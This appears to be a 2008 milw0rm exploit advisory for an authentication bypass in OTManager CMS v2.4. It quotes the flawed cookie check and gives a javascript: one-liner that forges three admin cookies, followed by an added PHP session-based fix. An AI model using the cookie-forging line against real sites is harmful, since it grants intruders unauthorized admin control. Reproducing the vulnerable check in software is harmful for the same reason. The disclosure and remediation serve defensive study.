###################################################################################
#                                                                                 #
#    ...:::::OTManager CMS v2.4 Insecure Cookie Handling Vulnerability ::::....   #
###################################################################################

Virangar Security Team

www.virangar.net
www.virangar.ir

--------
Discovered By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
-------
DESCRIPTION:
OTManager CMS suffers from insecure cookie handling: when an admin login is successful, the script creates
a cookie to show the rest of the admin area that the user is already logged in. The bad thing is that the cookie doesn't
contain any password or anything alike; therefore we can craft an admin cookie and make it look like we are
logged in as a legit admin.
---
vuln code in /Admin/index.php:

// only client-supplied cookie values are checked; nothing is verified server-side
if ($_COOKIE['ADMIN_Hora'] != '' and $_COOKIE['ADMIN_Logado'] == 'SIM' and $_COOKIE['ADMIN_Nome'] != ''){
    header('Location: ADM_Pagina.php'); // redirect to admin area
}

---
exploit:
javascript:document.cookie = "ADMIN_Hora=1; path=/"; document.cookie = "ADMIN_Logado=SIM; path=/"; document.cookie = "ADMIN_Nome=1; path=/";
-----
now visit /Admin and you can get admin access and manage the cms ;)
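
A hardened form of the check in /Admin/index.php, added here as an example; it is not code from OTManager or from the advisory's author. The names admin_login(), is_admin(), start_admin_session(), ADMIN_IDLE_LIMIT and the session keys are hypothetical, and the block assumes PHP 7.3+ with the admin area served over HTTPS.

```php
<?php
// Added example, not OTManager code: login state lives in the server-side
// session, so ADMIN_Logado / ADMIN_Nome / ADMIN_Hora cookies are never read.
const ADMIN_IDLE_LIMIT = 1800; // seconds; constructed value

function start_admin_session(): void
{
    if (session_status() === PHP_SESSION_ACTIVE) {
        return;
    }
    session_set_cookie_params([       // array form needs PHP 7.3+
        'path'     => '/Admin',
        'secure'   => true,           // assumes the admin area is served over HTTPS
        'httponly' => true,
        'samesite' => 'Strict',
    ]);
    session_start();
}

// Hypothetical helper; $storedHash is assumed to be password_hash() output.
function admin_login(string $name, string $password, string $storedHash): bool
{
    if (!password_verify($password, $storedHash)) {
        return false;
    }
    start_admin_session();
    session_regenerate_id(true);      // fresh session ID on privilege change
    $_SESSION['admin_name'] = $name;
    $_SESSION['admin_seen'] = time();
    return true;
}

function is_admin(): bool
{
    start_admin_session();
    $seen = $_SESSION['admin_seen'] ?? 0;
    if (empty($_SESSION['admin_name']) || time() - $seen > ADMIN_IDLE_LIMIT) {
        $_SESSION = [];               // drop stale or missing login state
        return false;
    }
    $_SESSION['admin_seen'] = time();
    return true;
}

// Check in /Admin/index.php; ADM_Pagina.php must call is_admin() itself too.
if (is_admin()) {
    header('Location: ADM_Pagina.php');
    exit;
}
```

With this check, the three cookies set by the javascript: line above have no effect, because the only value the browser holds is an opaque session ID issued after password_verify() succeeds.
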
-------
young iranian h4ck3rz

# milw0rm.com [2008-06-27]